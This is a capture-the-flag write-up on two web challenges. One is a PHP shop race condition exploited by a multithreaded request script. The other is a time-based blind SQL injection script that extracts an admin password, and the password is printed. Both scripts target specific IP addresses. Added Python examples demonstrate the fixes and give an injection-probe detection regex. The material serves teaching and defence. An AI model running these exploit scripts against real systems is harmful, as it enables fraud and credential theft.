Race-condition vulnerabilities in web applications

    simple_shop

    Race conditions in web applications:

    In threaded programming, the operating system provides a lock mechanism to keep data operations consistent and to protect critical-section code. With a lock, only one thread at a time can be inside the critical section even on a multi-core, multi-threaded system, so the data operated on inside the critical section stays consistent.

    A critical section is a piece of code that accesses a shared resource (for example a shared device or shared memory) which cannot be accessed by several threads at the same time.

    A race condition occurs when several threads access the same shared code, variable, file, etc. at the same time without any locking or synchronization.

    A scan with Yujian (御剑, a directory scanner) turned up a backup of the source; the key part is as follows:

    if ($_POST['money']) {

        $money = intval($_POST['money']);
        if ($money < 0) {
            echo "<script>alert('我们极光虽然有钱...但兄弟姐妹你这样我们会破产的...')</script>";
            exit();
        }
        // Check-then-act: the balance is compared here, but the two UPDATEs below
        // are not atomic with this comparison, so concurrent requests can all pass it.
        // $rest is the current balance, loaded earlier in the file (not in the leaked fragment).
        if ($money <= $rest) {
            $sql = "UPDATE account SET rest=rest-" . $money;
            $db->query($sql);
            $sql = "UPDATE account SET own=own+" . $money;
            $db->query($sql);
            echo "<script>alert('支付成功');window.location.href=this.location.href</script>";
        } else {
            echo "<script>alert('支付失败,可能是因为您的余额不足。')</script>";
        }
        $sql = "select own from account";
        // The backup assigned this to $banner but tested $own; the variable is unified here.
        $own = intval($db->query($sql)->fetch_assoc()['own']);
        if ($own >= 21) {
            echo "等等..竟然!无中生友,你怕不是黑黑黑...
    ACTF{************}";
        }
    }
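The check-then-act sequence above (read `rest`, compare, then two unconditional UPDATEs) is the window that concurrent requests exploit. As an added example that is not part of the original writeup, the following Python re-creates both that sequence and a hardened version against a constructed SQLite `account` table, using a barrier to park every thread between the check and the write so the outcome is repeatable; the table layout, the starting balance and the SQLite specifics are assumptions. The hardened version folds the balance check into the UPDATE's own `WHERE` clause inside an immediate transaction, so only the purchases the balance actually covers succeed regardless of how many requests arrive at once.

```python
import os
import shutil
import sqlite3
import tempfile
import threading

MONEY = 20        # price of one purchase (constructed)
START_REST = 20   # starting balance: exactly one purchase is affordable (constructed)
THREADS = 5       # concurrent "pay" requests


def make_shop_db() -> str:
    """Create a throwaway file-backed SQLite database shaped like the challenge's table."""
    path = os.path.join(tempfile.mkdtemp(), "shop.db")
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE account (rest INTEGER, own INTEGER)")
    con.execute("INSERT INTO account VALUES (?, 0)", (START_REST,))
    con.commit()
    con.close()
    return path


def vulnerable_pay(path: str, money: int, barrier: threading.Barrier) -> bool:
    """Same shape as the leaked PHP: read the balance, decide, then update unconditionally.
    The barrier holds every thread in the gap between check and write; a real attacker
    gets the same effect by firing requests in parallel."""
    con = sqlite3.connect(path, timeout=10, isolation_level=None)  # autocommit per statement
    rest = con.execute("SELECT rest FROM account").fetchone()[0]
    ok = money <= rest            # every thread sees the untouched balance here
    barrier.wait()
    if ok:
        con.execute("UPDATE account SET rest = rest - ?", (money,))
        con.execute("UPDATE account SET own = own + ?", (money,))
    con.close()
    return ok


def safe_pay(path: str, money: int, barrier: threading.Barrier) -> bool:
    """Hardened form: the balance check is evaluated inside the UPDATE under the
    database's write lock, and rowcount reports whether this purchase went through."""
    con = sqlite3.connect(path, timeout=10, isolation_level=None)
    barrier.wait()
    con.execute("BEGIN IMMEDIATE")  # take the write lock up front, no deferred upgrade
    cur = con.execute("UPDATE account SET rest = rest - ? WHERE rest >= ?", (money, money))
    ok = cur.rowcount == 1
    if ok:
        con.execute("UPDATE account SET own = own + ?", (money,))
    con.execute("COMMIT")
    con.close()
    return ok


def run(pay_fn, threads: int = THREADS, money: int = MONEY) -> dict:
    """Fire `threads` simultaneous purchases through pay_fn and report the final state."""
    path = make_shop_db()
    barrier = threading.Barrier(threads)
    results = []

    def worker():
        results.append(pay_fn(path, money, barrier))

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    con = sqlite3.connect(path)
    rest, own = con.execute("SELECT rest, own FROM account").fetchone()
    con.close()
    shutil.rmtree(os.path.dirname(path))
    return {"successes": sum(results), "rest": rest, "own": own}


if __name__ == "__main__":
    print("vulnerable:", run(vulnerable_pay))   # all 5 succeed, balance goes negative
    print("hardened:  ", run(safe_pay))         # exactly 1 succeeds, balance ends at 0
```

The conditional UPDATE is the part that matters: a balance check done in application code and a write done afterwards are two separate steps, and no amount of input validation closes the gap between them. Checking `rowcount` (or the affected-rows count in PHP's `mysqli`) is what tells the application whether its own purchase was the one that got through.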
    

    Multithreaded script:

    import requests
    import threading
    import queue

    url = "http://47.112.16.34:22255/index.php"
    threads = 20
    q = queue.Queue()

    # one queue item per request; 50 payments of 1 are enough to push own past 21
    for i in range(50):
        q.put(i)

    def post():
        while True:
            try:
                # get_nowait avoids the empty()/get() race that could block a worker forever
                q.get_nowait()
            except queue.Empty:
                return
            r = requests.post(url, data={'money': 1})
            print(r.text)

    if __name__ == '__main__':
        # keep the thread objects so every worker is joined (the original only joined the last one)
        workers = [threading.Thread(target=post) for i in range(threads)]
        for t in workers:
            t.start()
        for t in workers:
            t.join()
    

    Easy web

    A Yujian scan turned up a robots.txt and an image.php.


    Crawlers are disallowed from *.php.bak, so I tried image.php.bak and got the backup to download:

    // blacklist filter: strips NUL bytes, a literal "%00" and single quotes from both parameters
    $id=str_replace(array("\0","%00","\'","'"),"",$id);
    $path=str_replace(array("\0","%00","\'","'"),"",$path);
    

    Poking at it gave no error output, so I guessed time-based blind injection and borrowed Binbin's script:

    # insert into member(`username`,pw,sex,phonenum,email,address) values('wangwu',md5('a'),'a','aa','a','a')
    import requests
    import time

    url = "http://47.106.94.13:40005/image.php?"
    #params = "id=\0&path= or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))={}),sleep(5),1)--+"
    params = "id=\0&path= or if((ascii(mid((select password from users where username=0x61646d696e),{},1))={}),sleep(5),1)--+"

    string = "1234567890abcdefghijklmnopqrstuvwxyz -ABCDEFGHIJKLMNOPQRSTUVWXYZ:_@,{}."

    #payload = "if((ascii(mid((select group_concat(database()) ),{},1))={}),sleep(4),1))#"
    #payload = "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}),sleep(4),1)"
    #payload = "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='Look_here'),{},1))={}),sleep(4),1)"
    #payload = "if((ascii(mid((select * from Look_here limit 1),{},1))={}),sleep(4),1)"
    get = ""
    for i in range(1, 100):
        found = False
        for j in string:
            parm = params.format(str(i), str(ord(j)))
            url2 = url + parm
            try:
                # a 3 s timeout means sleep(5) fired, i.e. this character matched
                response = requests.get(url2, timeout=3)
            except requests.exceptions.Timeout:
                get += j
                found = True
                print(get)
                time.sleep(1)
                break
        if not found:
            # no character matched at this position: end of the value (the original looped forever here)
            break
    print("result:", get)
    
    

    That produced the password 596c3f5fcccfdfef231c and the login worked; I haven't figured out the rest yet, so this is a placeholder for now (›´ω`‹ )
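The image.php filter strips NUL bytes and quotes, yet the injection still works because the value lands in an unquoted position, where no quote is needed to leave the string context. As an added example that is not part of the original writeup, the following Python reproduces the blacklist against a constructed SQLite table, shows that a quote-free input still changes the result of a string-built query while a parameterised query treats the same input as plain data, and adds a small log check for the time-based probe pattern the writeup used. The query shape, the table and the detection markers are assumptions: the page shows only the filter lines.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def challenge_filter(value: str) -> str:
    """Same blacklist as the leaked image.php.bak: strip NUL, a literal %00 and quotes."""
    for bad in ("\0", "%00", "\\'", "'"):
        value = value.replace(bad, "")
    return value


def make_images_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the challenge's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE images (id INTEGER, path TEXT)")
    con.executemany("INSERT INTO images VALUES (?, ?)",
                    [(1, "a.png"), (2, "b.png"), (3, "secret.png")])
    return con


def lookup_string_built(con: sqlite3.Connection, id_value: str) -> list:
    """Assumed query shape: the filtered value is concatenated into a numeric
    comparison, so the quote blacklist never had anything to protect."""
    clean = challenge_filter(id_value)
    sql = "SELECT path FROM images WHERE id=" + clean
    return [row[0] for row in con.execute(sql)]


def lookup_parameterised(con: sqlite3.Connection, id_value: str) -> list:
    """Hardened form: the value is bound as data and is never parsed as SQL."""
    rows = con.execute("SELECT path FROM images WHERE id=?", (id_value,))
    return [row[0] for row in rows]


# Markers of the time-based and schema-walking probes seen in the writeup (assumed list).
PROBE_MARKERS = re.compile(
    r"\b(sleep|benchmark)\s*\(|information_schema|\bunion\s+select\b", re.IGNORECASE)


def is_injection_probe(query_string: str) -> bool:
    """Flag a request query string that carries the probe pattern; percent-decode
    first so that %28 and friends cannot hide the parentheses from the check."""
    return PROBE_MARKERS.search(unquote_plus(query_string)) is not None


if __name__ == "__main__":
    con = make_images_db()
    print(lookup_string_built(con, "0 or 1=1"))   # every row: the filter let it through
    print(lookup_parameterised(con, "0 or 1=1"))  # no rows: treated as a literal value
    print(is_injection_probe("id=%00&path=+or+if((1=1),sleep(5),1)--+"))  # True
```

The filter removes exactly the characters the author of the page expected an attacker to need; the request that succeeded never used them. Binding parameters removes the question entirely, and the probe check is the kind of signal a WAF rule or access-log search can key on while the query is being fixed.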

Original article: https://www.cnblogs.com/localhost-ha/p/11735881.html